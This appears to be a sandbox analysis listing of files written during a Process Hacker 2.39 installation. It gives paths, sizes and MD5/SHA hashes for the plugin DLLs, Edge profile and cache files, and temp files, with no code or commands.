be4dc4d2d1d05001ab0bb2bb8659bfad

SHA1
c0ed9e375b447b61c07c0b00c93bb81c87bcfc2e

SHA256
61e8cd8de80a5c0d7ced280fe04ad8387a846a7bf2ee51bcbba96b971c7c1795

SHA512
31389e268fe3bf1175fa3c251ca026f77dc59361b8425c9826f31d18c5174e6de68c6092aef187f2bd2c92d89b3093a660b2fe6189af369293c1117c856b5cdf

Download Submit
C:\Program Files\Process Hacker 2\plugins\ExtendedServices.dll

Filesize
136KB

MD5
4858bdb7731bf0b46b247a1f01f4a282

SHA1
de2f9cbcec1e1fa891d9693fb3cadfdd4cfe1f60

SHA256
5ae7c0972fd4e4c4ae14c0103602ca854377fefcbccd86fa68cfc5a6d1f99f60

SHA512
41b39560e15d620733ca29dc37f55a939a653f99686ac86643ccc67fbb807ad95d1996b867319d98506f3b8a30772fff3c3317bbcc205987f48031923f674d9a

Download Submit
C:\Program Files\Process Hacker 2\plugins\ExtendedTools.dll

Filesize
196KB

MD5
bc61e6fb02fbbfe16fb43cc9f4e949f1

SHA1
307543fcef62c6f8c037e197703446fcb543424a

SHA256
f2805e0f81513641a440f1a21057a664961c22192cb33fca3870362c8f872d87

SHA512
0bbfe53e1dd933a3080d9775ad890fcbd73f9820885efa6b69e9664261249f34eaae3870f74de8511734fc9a0114f36e1bfc529a032d303a8e3e583e37a506c6

Download Submit
C:\Program Files\Process Hacker 2\plugins\HardwareDevices.dll

Filesize
180KB

MD5
a46c8bb886e0b9290e5dbc6ca524d61f

SHA1
cfc1b93dc894b27477fc760dfcfb944cb849cb48

SHA256
acd49f2aa36d4efb9c4949e2d3cc2bd7aee384c2ced7aa9e66063da4150fcb00

SHA512
5a4d2e0fa7a1a14bc4c94a0c144bfbfcef1ecabe4dc15f668605d27f37f531934778f53e7377bab0ff83531732dc15e9fc40b16f2d1f7e925429681bd5bdca73

Download Submit
C:\Program Files\Process Hacker 2\plugins\NetworkTools.dll

Filesize
134KB

MD5
d6bed1d6fdbed480e32fdd2dd4c13352

SHA1
544567d030a19e779629eed65d2334827dcda141

SHA256
476aa6af14dd0b268786e32543b9a6917a298d4d90e1015dac6fb2b522cf5d2e

SHA512
89362a7b675651f44649f0ea231f039e0b91aba9f84c91545f15e187c6cbd07bbf3648a4e232dfe5122cf5636e67c458f4f7dab49ed4de3f3a303aa396c41d1c

Download Submit
C:\Program Files\Process Hacker 2\plugins\OnlineChecks.dll

Filesize
222KB

MD5
12c25fb356e51c3fd81d2d422a66be89

SHA1
7cc763f8dc889a4ec463aaba38f6e6f65dbdbb8c

SHA256
7336d66588bbcfea63351a2eb7c8d83bbd49b5d959ba56a94b1fe2e905a5b5de

SHA512
927d785d03c1ee44b5e784b35a09168978b652f37fb73a1a2eeecd3583c28595fb030e8c1f87ab9a20beac4622775777820d1a2ad7219ba8b9ae8b6fbc4568a0

Download Submit
C:\Program Files\Process Hacker 2\plugins\SbieSupport.dll

Filesize
95KB

MD5
37cbfa73883e7e361d3fa67c16d0f003

SHA1
ffa24756cdc37dfd24dc97ba7a42d0399e59960a

SHA256
57c56f7b312dc1f759e6ad039aac3f36ce5130d259eb9faad77239083398308b

SHA512
6e0bfab9ff44f580f302cabd06fc537a9e24432effd94b50ab696b35f57a61772072b7f9045a9e99fa4bf3bc316f43ea25ab6c87517242e7957eb86575203bed

Download Submit
C:\Program Files\Process Hacker 2\plugins\ToolStatus.dll

Filesize
243KB

MD5
3788efff135f8b17a179d02334d505e6

SHA1
d6c965ba09b626d7d157372756ea1ec52a43f6b7

SHA256
5713d40dec146dbc819230daefe1b886fa6d6f6dbd619301bb8899562195cbab

SHA512
215d6c3665323901d41ae5151908c4e084a04a1558617016f0788194304e066410b92943bd6c119339727037ee02cfda893b9baf5603b2870d9fc5ae0c77ca7e

Download Submit
C:\Program Files\Process Hacker 2\plugins\Updater.dll

Filesize
110KB

MD5
6976b57c6391f54dbd2828a45ca81100

SHA1
a8c312a56ede6f4852c34c316c01080762aa5498

SHA256
0c11cdc3765ffb53ba9707b6f99ec17ae4f7334578a935ba7bcbbc9c7bdeed2e

SHA512
54d8b39457f516d921bb907615ff60a46b6031e1444a443c9657e06d78c9fb0f637ae4756bb7b884e4dca2f55902372ad4ddba1d020abe02e0a381702ae270cc

Download Submit
C:\Program Files\Process Hacker 2\plugins\UserNotes.dll

Filesize
114KB

MD5
e48c789c425f966f5e5ee3187934174f

SHA1
96f85a86a56cbf55ebd547039eb1f8b0db9d9d8d

SHA256
fc9d0d0482c63ab7f238bc157c3c0fed97951ccf2d2e45be45c06c426c72cb52

SHA512
efdb42e4a1993ee6aa5c0c525bd58316d6c92fbc5cebbc3a66a26e2cf0c69fe68d19bc9313656ad1d38c4aef33131924684e226f88ef920e0e2cd607054a857c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
ebdc6f4443172279886f495a6342295e

SHA1
8174ea285bdf72a39851b3cc96c7a454589f097a

SHA256
89ccf7a20805dfdbdc710215b44796f675fd5dbcd30990067a663e7fec948e70

SHA512
93d719927d45e9d8860de08c682e92a43a9818051dd6bb3e2be10de8edd410927b4f043013ab9bf9ccc5a8d2b837ced02e5ef910871836d7cde3c9f7bfe1136c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
dabfafd78687947a9de64dd5b776d25f

SHA1
16084c74980dbad713f9d332091985808b436dea

SHA256
c7658f407cbe799282ef202e78319e489ed4e48e23f6d056b505bc0d73e34201

SHA512
dae1de5245cd9b72117c430250aa2029eb8df1b85dc414ac50152d8eba4d100bcf0320ac18446f865dc96949f8b06a5b9e7a0c84f9c1b0eada318e80f99f9d2b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
c39b3aa574c0c938c80eb263bb450311

SHA1
f4d11275b63f4f906be7a55ec6ca050c62c18c88

SHA256
66f8d413a30451055d4b6fa40e007197a4bb93a66a28ca4112967ec417ffab6c

SHA512
eeca2e21cd4d66835beb9812e26344c8695584253af397b06f378536ca797c3906a670ed239631729c96ebb93acfb16327cf58d517e83fb8923881c5fdb6d232

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001b

Filesize
211KB

MD5
151fb811968eaf8efb840908b89dc9d4

SHA1
7ec811009fd9b0e6d92d12d78b002275f2f1bee1

SHA256
043fd8558e4a5a60aaccd2f0377f77a544e3e375242e9d7200dc6e51f94103ed

SHA512
83aface0ab01da52fd077f747c9d5916e3c06b0ea5c551d7d316707ec3e8f3f986ce1c82e6f2136e48c6511a83cb0ac67ff6dc8f0e440ac72fc6854086a87674

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000044

Filesize
65KB

MD5
fd3ce997da60e2d57f8c151039369e33

SHA1
b4d4d9cde97c4f44b92b5a95aeddb0438cd21a52

SHA256
d90b0c1992ebc9f21db14ba631621c924c7ab1e6c56cba593ca1ac273286acaf

SHA512
1fcdab535af2538f61f4f297858d9a8b1043e3614396ac8f9b10c9f88e85c87a9d67d19716b223bce568f98a170fc6f8028e2e0e6493bc2e21ab38eaaf0b470d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000048

Filesize
91KB

MD5
f1e0ea86bce48fec066266aef8e0a4d3

SHA1
fd078f29b76ba8468ce56e0c9202676822a577cd

SHA256
32a5b5e9f4447ed3193a9db44fcdc25615aace432b69f7b87f3ce026fb1652d2

SHA512
4dfacfc52b1f23e78070e0fd505cc22bb48757e2ebef47c02c0909983822c56bc6f200fe43410945a586f7f6645f245755ba8adf089419c91efe8b8442abc65b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000049

Filesize
17KB

MD5
f4726db5eaab86295faefcddb07a092f

SHA1
05b4cfecafa0f2dbb014a4aa3677d78ce549557a

SHA256
97def13049b66a087032ecdec37c295d8fa48373cbc7f2d5fed44268660625d9

SHA512
4714316bb387251592912e847f55dac661bd0adb350dcdbc604fa28d9cb48be8d97f0851998b53de9242abe7278da731617dad823099868a54d767a91c477947

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00004a

Filesize
30KB

MD5
1a9a4ffe722dc17312769538424c6e09

SHA1
0909db940c9beed1d39b856ed00407aeb814e436

SHA256
05cc021f5ec55857db28b6a2eb953c998daf1a3aceb0ab2a7bf59ec303dabc4f

SHA512
98720051d3c8f9941f3238b574147e7bc8c78dd945a76e45e55b403d9b2b617a657418f0f1c8b7d81d2c9bd881c824385d372777191e920771f78947bd279eed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00004b

Filesize
145KB

MD5
712951a22107d32902d0006d22dba0aa

SHA1
e879d41927553d4ad328e40c24f7f67085c79863

SHA256
f8a78979f7f2327e8220b546a1f7865fd14b018b857f9b0aaad16155dc596c6c

SHA512
1cc8f1c862c685260aad6d971ead3359b2ae73e159334e6b61fb00e550f31188a50b799e81215f2f5fe4f20ac002cad60dd5dcf300d91b73928a7353c74a7b8d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00004e

Filesize
20KB

MD5
4b2026d30018fb08216cad5165da2a9e

SHA1
c689f4dcfcaf371494da6384254698ba3a1466f1

SHA256
64bb69d41b5874df1ee2f5695056990120355a7cc124ddfe577574574657de5c

SHA512
f73986bc249a29d32fb601a286420868819850901495f3521af993f7733fc2f9ce7069d7d963c5407e13358416a905f8e56558729e6500761c7671c45a051936

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00004f

Filesize
62KB

MD5
1721006aa7e52dafddd68998f1ca9ac0

SHA1
884e3081a1227cd1ed4ec63fb0a98bec572165ba

SHA256
c16e012546b3d1ef206a1ecbbb7bf8b5dfd0c13cfeb3bdc8af8c11eaa9da8b84

SHA512
ff7bfd489dc8c5001eea8f823e5ec7abf134e8ad52ee9544a8f4c20800cb67a724ec157ca8f4c434a94262a8e07c3452b6ad994510b2b9118c78e2f53d75a493

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000050

Filesize
19KB

MD5
055c39f1ead06724e540b3c0d877cead

SHA1
5d7ffdeb534b6bea5443838f9534fc6640ee1526

SHA256
0305d258c756aeac531d72a410cc42d0ae302cb74a2d8b5dca2ee590b7f5b1d2

SHA512
0e95c4c344e0f81be53dcf1c441525f10a8a231e39e3614912dbc14fc6b6575dbb68dd93f741b80c0da986270003b97b5adaceba996b734b1678150e8ce5dd62

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\336a68eaaf209f48_0

Filesize
309B

MD5
8388dde8e961bcaf1be8ca93e3a99802

SHA1
9a971cf9f34fe19280b87ba952a79d356f8e5693

SHA256
9be7529c4b59d00e358b70fb6f594f3bfa9d8ba37266e913918c6972a8c74a1f

SHA512
d0500f0e06040114a0a352514194926cb2106037861d5120b841ed529b349ce6fe8cdf956c4b0d41c6e39f98ea6b2ed44a4883f3e97694a641fc7583102d7126

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\7b25d580c1086434_0

Filesize
365KB

MD5
843163b37a06303ce66d776148673a42

SHA1
b46085283ee5a2762ec1af0b0bb675f1ede1f550

SHA256
9e507f7cac489308df62352e8b2b77fda5fea924de868574614c9ff4269efa24

SHA512
8ddedc0131d86b78db4159b9dcc5605e55f0417edb5fc1d898e4330b829d80cda3194330e81ea9aef63f1fa336ce9f102e48022c26cccf8da5d84f2d0ca3bb6e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\d9026e0c0c13d7c6_0

Filesize
36KB

MD5
54bd153beba194fee535e0c87e775469

SHA1
5209bee75df770f47677148ede6a504b39d3cd57

SHA256
10eee74cad006bef2073e63aa2c18197d944b3d1645ae7fcd4825917c8fe3a6d

SHA512
058498f4f5f2a0300dc35fe817ecfedfe53a7141407b0ef10308a559acf60e57144301587ad52dc9a2d76f1df06590efa7546a6928eaf2aec71f207076a09d77

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
4KB

MD5
207f0d51c761c291a39b3c690ff071e0

SHA1
a8edeef7b4f9122f8fddc8dd585dc2b85cb7db6d

SHA256
29b376f29bf25e353e9e364107d6260437052774e416888ec4d0bc930c01df84

SHA512
e837dd06e1c3aae9ac557cab659151845340cfd5d31fd5c32d863b37d36121360fa40e74e22553038474741542c0be9aca09c6ef4f7f76ee5a91abb4fb5447c5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
3578ba4f8c28f9e231db3d979910909f

SHA1
421571cca005dd795804e169f4c896d5d920208f

SHA256
3feb0cd8a48a9b0ba969a3b0ab4272864bc061426c7a5d5db9227db57531a736

SHA512
d05d21931fb903552d0637e68b1603dcc6eacdaee0e70c1cf73d4d5b92a9b794484081a5eccb1a637bedecf1b3d2de280a77db584e057df9ce5e97221e08d8bf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
61B

MD5
4df4574bfbb7e0b0bc56c2c9b12b6c47

SHA1
81efcbd3e3da8221444a21f45305af6fa4b71907

SHA256
e1b77550222c2451772c958e44026abe518a2c8766862f331765788ddd196377

SHA512
78b14f60f2d80400fe50360cf303a961685396b7697775d078825a29b717081442d357c2039ad0984d4b622976b0314ede8f478cde320daec118da546cb0682a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
6KB

MD5
cfde1abb63492ae1339b40cc993f69d7

SHA1
358f023bfe01ae463f9c8fce60318c247020556e

SHA256
c1c7b2bb02f13dcc92c2dba17e7c997707bc299535b6b2ff4980928c13675ac9

SHA512
7bad6af9abddfec0f316a7c27788aac1485e8627b68d035e08ee4d3d45735f1038f386771b580dc6135ac41986be734ae69be6cc868f432623a409dc416604c4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
8KB

MD5
30afa40f828e6008f57340a2aca69efa

SHA1
8cf02ddf2b02e11eaf4aacbcb012a00fe62afec7

SHA256
f169373fa3d68bf30f6510fc8054f8224dc05cf9d5b01e0f7fcd31abbd097c28

SHA512
b918bdedf426a1b9dcdb5dbebf6aea5013063d39744b3f47dfe8ac6514d4ff86810ee72f8f979c5aadbe846dddcb65c462904f95566b43791f430594952bcf9e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
8KB

MD5
b820301ee4ea40153f1bf3fa020ea1d0

SHA1
eb7e4523b21f21321a3ab4788893214a57ded21b

SHA256
b565b58bf68c96627c0f4301c36409e35519cabf0bfa5353d2c401de7f13560a

SHA512
fad2dedad9aac65ca0dec578822810b535772f3dfa029b8e27cbbcf8031eecd896dfc3f41b3ec294a2dce063502bafc3430d4dfa0d48f84f3b7d795f13d6bf68

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
9KB

MD5
2c88707caa2dca86a06f28860efb18f5

SHA1
1fd3328c5681a1911d2204ca840c4a1357399cc5

SHA256
4fff95062eef0b480f7ec6bf91bdb59084a622d93aa95b36c52253012cec10b1

SHA512
c54d0f41358271fa2b50c50bf39e86563a962f31eb89bda7475568fc2f4d4c6caca4f76c71c89a242219ae3fedd63a2800ca3d16b4728f4440d45d4036d97009

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
06c0a7e5db71bcf70a4cc3925f6fd47b

SHA1
ca6c42149d2e0c224acacd95b63bde1085c44383

SHA256
00efb1e246629c9b17be20a2f7506609f4241e6eec07003714184badfb4593ec

SHA512
80ec0b0c93fda93dd08b68456c67c05a105c09e10cdd92472a050165ed93c1841f451f17eefe6f976e03361715066e6b65ab791fe69360e15e0a1ad444781b32

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
b9692be41aaf2111cd86a27a5febeced

SHA1
f0a48e7149d10cfca38314f5ef736ee21fecabb9

SHA256
cf10cd4a246a958d143f85969656fdea7e62055f4756c6972e612e0395c8680a

SHA512
31a7efa342331cc9b5f7723eb4c4f89cc8f447817f19d8972aa573e09d26f7b917178fbfec5742fbe200e468914dd5e32cae8248b4fcdc9b288347fedd6b0a05

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
11KB

MD5
79c6794e25b085c3532f18c88354ba85

SHA1
a3d9e820a6ced636fdc02422d0c3f11329eaba30

SHA256
811da39d1ddd46f76e5c888864a78c60ba54420f4ac372befa20db8bc93e2ed9

SHA512
1b4467dacaa11a2a0770d8d3b93d22ae2c288f07d9f2b579bb6b922ec89ec6d884048c295bc88ddfe9c5ca091f0f5f76f9dac6026d95f7c31e4918d36d562e43

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
11KB

MD5
c1697a555334c0629924f740e32ff0c0

SHA1
6890912e354bdbd44f01059fc976b59ea30f1a18

SHA256
73eb22788f3f440aaf473440e8411e06a9b79345d2a6832a78eb86fd3634e49c

SHA512
df09a3088423c5523d1d0b2eb564734465f441ad915e18a46596de021542913a070ca24c3b36ae5b4eb618820cc2f6c6f9639e579c7c5b3ef896f74c9f11577b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
11KB

MD5
3d336e349dce0b37565f507cdec5bd4b

SHA1
deea3869f877243671e1da468125a2ca38a561cd

SHA256
abbe1339a4e52f57fa1bc72790972456c3522e4150ffa7f2c8bef26d29f041c8

SHA512
10f44b20ddae5136b0d08b207193bb37501cf72e289737ad6e7cf05d4bdd0daa060cd255718f1e81b3579320b557531911a52bf3785197bb58029e7f57066e04

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
11KB

MD5
6da45d42ef1dc7d42e576746f7a97c65

SHA1
1516b9acb4f99ea7d1ce25bb5e7d8f58571a720d

SHA256
d3b0b62fb28d62061f8dc1d0606dc73a311a1904a8ffd214a8ce785b37b9ab9f

SHA512
6d621e73857875b184ece9c56a3a444eb945f4dfdd7dbf7afc41eb71253feefe351a7e57f97ab4e0414c6cdff35f0ffad634b0dc878e98bdbe1185ee9211b9d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
10KB

MD5
1bf3eba685944e2ccdd78d1ce67a0845

SHA1
6044789a7ae5ed8b890213907acd4a56edd180fc

SHA256
d1de58183b0f16d7d52db82d681dfa450534d8a00ac1654aa2fabee2af61a776

SHA512
45fa0f394aba161637e3ad31030f342930c989fb76a7d08d00dc27c602b95dc3cd3091c00c5236b84da378e1f7c0b4790115419957b86ee88ec420ff586ae737

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
11KB

MD5
bc79cfcc3edacaa93a0d843fd68bc748

SHA1
b977fe8720cb5e3590c81ecc5dbba0995c9f84a7

SHA256
422f1b60abf902fcebac8362ecaa457aad13189d594a4a62cf8fd0f40a191375

SHA512
87920978bcb8ca216608b4e8f580c954701fd04a40eb70b3f337ab291fe7cefff323cdcad81b9a72c6c1521f853abbacb4c517da22622083e89c849691738e64

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
10KB

MD5
6a29cd3512dcc2793a31c5d986ec4cfb

SHA1
dfe361eca98d38267dde0047327d710fae4aac74

SHA256
aa6b3bdfc2b799537dab95c836b94e5b177b8ea083d36e3e1f3b8708b7e1a9c3

SHA512
248917035aac0b3dc5d1970bc2592fac975d56a1cfeb995718c0589f819bb6cd28bd1eec0e772a17635d851fa6ddfedac2849380fde1a012abeed0148fb6ab66

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
26KB

MD5
84a9ac1d87b2cd21d4bf3741e92c7d99

SHA1
3b8d13b5ef5df73609668723b1e57c6b4bb55838

SHA256
3bebbc472e1a463f17e93116b328e2c2a692c1ef7303c0896e404335a12737bf

SHA512
31855cc90b26b9268c74e2a19174b728d37ba686c1c7475b07f38a73b9ba352dc9b841df348f3bcb71c9db69784c3baa74c5bf6ae31f91845722bdb6250edf7c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
0d270ad6a860c171d6473b30fab897fa

SHA1
5e48fd9e3680861134cafe745e9eb252286128bb

SHA256
8ce6fd1161fabd71a6b3fd236f6d347b2715fa95d28d62a01a6684ee73a49045

SHA512
0eb52584c54e79cc4c97436acf8909d6b1e40e529b0f014b8b4f752f8af6f831396323b97d910a8b0db49b47a73f13a124b6d9e10c2527712ebc05f30f1ba5ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
fe28a5b866c8a0cf9d06e94c3bbd8ee6

SHA1
94a686ad969a9926002e089d0ca898ae10bae1f8

SHA256
df1ef7b617cd32c204d1535970fef18624d3f7e5274ed365c58f80d39838c7e5

SHA512
c8eb0ddcb0a03c65b9adeaa87d230dbdc96da85d8fd8c8dcc86b55230f56c58204c3a6744fc5e7aca6a82712b52ac5fcf4c6b903513332b7d2c9de91ad43b296

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
706efa06db0be5239358c256daff3603

SHA1
be5db582a8664d9597e547f4d5591500651e1669

SHA256
2528ea9f55c07b81f77cc7b4963c939f9d78979742309096feeae1099660b485

SHA512
6b6fadc7130e83c9dd136419c00a68ddb27eed0b1b78a1243dad8517ba97f9d1ce8ac63ab192c0b2101ba66e3a44c24176d22d0dc2f070feaab524821e24b6e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
4fe9249ef59fce2ef695c741551f7843

SHA1
5745b49ed2543e227db0af42a93098e48f2e79ef

SHA256
c87faef46216cf6f995ba806b6c2298f4668ada39249520d6921bb9609483cd3

SHA512
f3eea1e7f6b129abd372c608c0f152a4c45c75f528973b0b424e9efb362503b9c20c8ab033c7feca22eb8d0df0fd5dbf3cfdc5944dc4bc4d545a22f49473cc1d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
905af661a8166ae9dff1907ae441cea2

SHA1
79e0ea847a8d38c16244e37437deb70b6899fc30

SHA256
db09574ad92f01ffed92b9611cca701ab3ac30fd4184b28b1db617130d7205e8

SHA512
0c556122bbcb5ba2668ad55e76ca9df330537bef0ea470d531a70ce2503c59090bbd5405589cee846151bc6706cc9c9e96db2e2329138be48b1b9ea7e086a887

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
1becfe2a2f524328b3b06c6762f68c41

SHA1
d847aeefafb8f82c70b5ba579c7172641aa38d58

SHA256
24934b25254c76c11a7514adf1f2ce061b1ea6238b38bf2c0641edddba00b945

SHA512
7736df9aa3a396a3fb09cec8cdf284402e70f286e2993b385a06b8e286ac28c5980551b1dd47720a25876078f94456e3f926756ff43b1fbd6fc6f35f13d1aa13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57a4cb.TMP

Filesize
705B

MD5
f7a8549fd53f95e22788a708e8092edd

SHA1
ac235ea497d02ceb13fc6cb264e202b3e2cf2886

SHA256
71c861d2fc69457afc52b818c946fe4b449bd7a8a8cf56989f8849cd1761b0cf

SHA512
fedb92ee52f7ee690ab1a3c968e80adad2404ed1cb4d16daf23c487601608b151a638b52e19ff40f666a33db29bbc59e7897ab88c8683aa70ded859d93a2c462

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
aefd77f47fb84fae5ea194496b44c67a

SHA1
dcfbb6a5b8d05662c4858664f81693bb7f803b82

SHA256
4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611

SHA512
b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\ef25ce20-0956-40c8-8d32-1b66cda4137f.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
bbdcb39bf3d6a3479796dce00cee80ac

SHA1
3a289b2baff16c508bf0b472061146aae77db16a

SHA256
c7278867930605dfbd222f2c77cc0b8377392afde275afb20d75641b7a9d87fc

SHA512
6d789437632aadda79fddab74819e36ed08b7e3bf1f13d59015b5c84e639a07bb70ce5f6ce7802e85660ea124376a03d3d3686bfeae30103051c2650f0f00eb5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
07254734788971be4a47966b5ac4cd85

SHA1
dae08ecf5462920d70eeb21d064aa27e950cd027

SHA256
879b938d30e08afb585f92b1480a484e794091a7835d54a97597b833bc6e6b3d

SHA512
b9242613fe445056d422e72ba685fa583f5d546d03f7d8f9143dbcb65bb4330a1b03fdf35890a1b3334b956da0bd0d6939b737901e76554a7fae2585b0c22584

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
22ba698e79f6fc67b639ab2b0eeca6e9

SHA1
91f34feec517102d798f78a06267c7185ea9da39

SHA256
b8c94548c9fe8c848c191299f340e1139a6f10585c6789e5e081bb78605616e7

SHA512
46da61bbb4b55b3677f8b5367dbece9377bbcbb65c1aea00ff5f16d56756b36910a59c32b9a398310e8ca9573df852c03fe069952b44d8ff45f659801671af61

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
291303ccbdd60a5dcbfe4eba1da9fe8a

SHA1
984ad4782c8686700997b932eb7f3bb337ae9e0b

SHA256
81179abcfc609904ada669ab7a4675bb7940e1b020e9e04b3389114becd7cb5d

SHA512
924abba6da713dac0d894e2776774d297a1d778678386c354d808acdf8e6348d2d5877954ff4517fc86edf196d3005d70f60ea488b475d0a98f42597727cc62a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
ac48efea0ecf99b82ba0cff9ed2127fb

SHA1
bc057bb1a207a1c00ec97ed28a17ee64d6b5e05c

SHA256
489d99bb70719074a527451b59233ff7d5e66c5203d6524be4dd5b6e36c076ea

SHA512
d44eed50971a0ba90de6bf281204cbecad63255ba8fce8c1e62bda587c3c6de2d52955a0dfef7d7bebe9ef56b02abbf838c44dde04816575eb79c95dadb843a0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

Filesize
264KB

MD5
a9d54b75fb2142d97ce04eb51220fe23

SHA1
58020bb1e07b53960b247d732c0db27789e50b2a

SHA256
c8272b7771c724c07025755121226e86d9273b5f5f70cbf48957ad0113575dd5

SHA512
c97ee4650ba604188bef0b1ebf2a2ce529aaa5c0e0f7598c774c59eda40742867cdc4b77f0a41a68d0f8a4ba6d2f287f35d59c615a84e26e2e78f7368dddb145

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_crszmigx.4me.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-7LI5M.tmp\processhacker-2.39-setup.tmp

Filesize
785KB

MD5
1c96ed29e0136825e06f037bf10b2419

SHA1
b74a55279474253639bebf9c92f10f947145ff30

SHA256
b10cf8cdf541ca0dd6df79e66fb4b0854dcac717aba034ba0c4961bff92fd021

SHA512
0e74854d9de4e3944b2cff9b5de7eb19fdec1fee6c9576cae6cd81741adf84eac421cb743b1df30183f645ffe849357b6a85b5be8d7f6e2efe289bbe4573e177

